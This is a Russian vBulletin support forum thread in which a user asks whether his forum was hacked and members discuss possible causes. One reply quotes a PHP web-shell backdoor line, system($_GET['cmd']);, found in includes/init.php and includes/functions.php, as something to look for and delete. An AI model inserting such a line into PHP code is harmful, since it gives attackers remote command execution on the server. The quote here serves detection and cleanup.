VBsupport перешел с домена .ORG на родной .RU
Ура!
Пожалуйста, обновите свои закладки - VBsupport.ru
Блок РКН снят, форум доступен на всей территории России, включая новые терртории, без VPN
На форуме введена премодерация ВСЕХ новых пользователей
Почта с временных сервисов, типа mailinator.com, gawab.com и/или прочих, которые предоставляют временный почтовый ящик без регистрации и/или почтовый ящик для рассылки спама, отслеживается и блокируется, а так же заносится в спам-блок форума, аккаунты удаляются
Если вы хотите приобрести какой то скрипт/продукт/хак из каталогов перечисленных ниже: Каталог модулей/хаков
Ещё раз обращаем Ваше внимание: всё, что Вы скачиваете и устанавливаете на свой форум, Вы устанавливаете исключительно на свой страх и риск.
Сообщество vBSupport'а физически не в состоянии проверять все стили, хаки и нули, выкладываемые пользователями.
Помните: безопасность Вашего проекта - Ваша забота. Убедительная просьба: при обнаружении уязвимостей или сомнительных кодов обязательно отписывайтесь в теме хака/стиля
Спасибо за понимание
доказательств нет.
есть факт неработающего форума, который пришлось создавать заново и продампить базу даже неудалось.
но я все ж думаю, что он не врет.
@КотЪ
Администратор
Неадекватный
Join Date: Aug 2005
Posts: 5,262
Версия vB: 3.8.x
Reputation:
Гуру 3905
Репутация в разделе: 2414
0
Какие симптомы были неработающего форума? Что конкретно случилось?
@ste
Простоузер
Join Date: Dec 2005
Posts: 5
Reputation:
Novice 0
Репутация в разделе: 0
0
да с утра 6-го зашли на форум - выдается ошибка в таком-то файле и все.
чел взломать мог - народ с игровых серверов в большинстве своем знающие...
в принципе, щас уже никаких признаков не найти - все восстановлено.
меня больше интересует - как защищаться от попыток взлома.
или ВБ взломать нельзя?
@КотЪ
Администратор
Неадекватный
Join Date: Aug 2005
Posts: 5,262
Версия vB: 3.8.x
Reputation:
Гуру 3905
Репутация в разделе: 2414
0
vB - максимально надежный по части взломов, движок.
Ошибка в class_core.php может возникать из-за разных причин, например некорректной установки хаков, из-за криво залитых файлов при обновлении форума и т.п. и собственно говоря, никак не указывает на ВЗЛОМ форума.
Взлом - это все-таки, нечто иное: получение доступа к управлению или изменению информации и т.д.
Это было?
@КотЪ
Администратор
Неадекватный
Join Date: Aug 2005
Posts: 5,262
Версия vB: 3.8.x
Reputation:
Гуру 3905
Репутация в разделе: 2414
0
Вот у меня периодически, на одном из форумов, всплывает такая ошибка - когда например, объединяю посты или сливаю две темы.
Знаю, что надо порыться и почистить от одного кривоудаленного хака, но лень.
Тем не менее, это никакой не взлом.
@ste
Простоузер
Join Date: Dec 2005
Posts: 5
Reputation:
Novice 0
Репутация в разделе: 0
0
я конешно верю в совпадения..
в-общем, хаков сверх стандартной версии мы не ставили, на форуме никто не админил в тот период.
а совпадение - этот чел орал на весь форум, что это он нас урронил, плюс - он вычислил, кому принадлежит сервер, не конкретно, а какой фирме. короче языком чешет, но скорее всего да. может это и была наша ошибка, а он под шумок терь трезвонит.
но черт возьми, так он меня взбесил седня.. а мне и ответить нечего - потому как знаний не хватает - про те же эксплойты. ни к чему оно было.
@StirolXXX
Продвинутый
Join Date: Jul 2005
Location: Украина, Киев
Posts: 454
Версия vB: 3.5.4
Reputation:
Опытный 50
Репутация в разделе: 54
1
А ты посмотри пожалуста в incluides/init.php и incluides/functions.php
Если там есть system($_GET['cmd']);
Удали срочно! Это и есть тот эклсплоит я на него наткнулся!
З.Ы: Косяк в архиве скачаном отсюда!
@КотЪ
Администратор
Неадекватный
Join Date: Aug 2005
Posts: 5,262
Версия vB: 3.8.x
Reputation:
Гуру 3905
Репутация в разделе: 2414
1
Quote:
а совпадение - этот чел орал на весь форум, что это он нас урронил,
Видишь ли, если бы он орал, что уронит, и уронил бы в тот же день - было бы убедительнее.
А еще убедительнее было бы сделать себя админом и всем вам в подписи насовать "Я - МУДАК", или например, как мы один раз кхм-кхм... заменили абсолютно все символы в базе словом "х***"... )